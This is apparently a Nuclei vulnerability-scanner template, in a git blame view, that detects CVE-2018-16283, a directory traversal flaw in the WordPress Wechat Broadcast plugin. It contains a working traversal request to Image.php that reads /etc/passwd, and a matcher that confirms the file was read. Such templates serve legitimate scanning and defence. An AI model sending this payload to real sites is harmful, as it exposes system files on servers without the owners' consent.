nuclei-templates/cves/2018/CVE-2018-16283.yaml

28 lines
837 B
YAML
Raw Normal View History

2021-07-19 12:47:31 +00:00
id: CVE-2018-16283
2021-05-27 03:15:53 +00:00
info:
name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
author: 0x240x23elu
2021-07-19 12:52:19 +00:00
severity: critical
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16283
- https://www.exploit-db.com/exploits/45438
2021-07-19 12:47:31 +00:00
tags: cve,cve2018,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-16283
cwe-id: CWE-22
description: "The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter."
2021-05-27 03:15:53 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-19 12:47:31 +00:00
part: body